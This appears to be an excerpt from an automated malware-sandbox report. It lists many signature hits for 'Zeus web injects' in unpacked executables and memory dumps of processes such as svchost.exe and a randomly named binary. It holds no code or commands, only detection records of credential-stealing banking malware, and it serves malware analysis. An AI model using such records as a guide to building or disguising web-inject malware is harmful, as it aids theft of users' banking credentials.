Source: 2.3.svchost.exe.893000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.32.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2d00000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.16.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.c52000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.28.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2da0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.19.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88e000.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.406400.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.40.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c20000.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.20.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.13.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2b32000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.893000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2d63c00.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.27.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.38.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.29.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 27.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.29f2000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.30.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2dc0000.43.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.28c2000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.29.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.34.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2c90000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2ac0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.37.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88e000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1452000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2412000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2650000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.16.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 8.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e70000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2d00000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.35.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.893c00.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 38.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2762000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1242000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.27f2000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.15.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.12.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.893000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.8e2000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.dd2000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.23.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.31.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 15.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.960000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 23.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.26.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.roundwood.exe.6bf318.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.25d0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 21.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2cd0000.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.19.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.11.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 5.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.e30000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.33.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.10.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.15.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3c20000.8.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 19.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.14b0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.2.roundwood.exe.406400.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.34.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.893c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 12.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.1412000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.26.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.88e000.4.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 4.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.12e0000.3.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 29.2.oOzTQCDSVNrWDmuGqzFbKRbZs.exe.2922000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.3a40000.30.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.2748593286.0000000000E70000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000017.00000002.2469299462.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2418070085.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2471833561.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000F.00000002.2451003879.0000000000900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000C.00000002.2700298723.0000000001410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000004.00000002.2719357526.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2472684695.00000000008E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.2027860859.00000000006BA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2500002475.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2499726055.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.2689381612.0000000000DD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2479482654.0000000002D00000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2048298647.0000000002970000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2508798151.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2482262641.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2499866560.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2487147831.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2392591021.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2460078038.0000000002B30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2458081836.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2422680364.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2500272198.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2486303903.0000000002410000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3269898642.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000005.00000002.2689429346.0000000000E30000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001B.00000002.2475050431.00000000029F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2508679184.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000008.00000002.2747738831.0000000000C50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.2487689003.0000000002950000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2510071854.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2455624289.0000000001450000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2395495961.0000000003C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000015.00000002.2460508314.0000000002CD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2500141724.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3273788686.0000000002D00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000C.00000002.2700342737.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.2502070915.0000000002760000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.2487542677.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2510491693.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000004.00000002.2719273525.0000000001240000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2448622131.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2508393493.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2501374465.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2497016320.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000026.00000002.2502168671.0000000002900000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001D.00000002.2478719931.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2501604041.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2455382191.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2486764914.00000000025D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2469676261.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3272240736.0000000002915000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2510323696.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000013.00000002.2455739148.00000000014B0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.2033223674.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2508541619.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.3060629328.0000000002DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2570365409.0000000002C90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2501156976.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2473316243.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000017.00000002.2469451874.0000000002AC0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2039128635.000000000088E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2478689860.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2450971544.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2510195177.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3273788686.0000000002D63000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2508233599.0000000003A40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
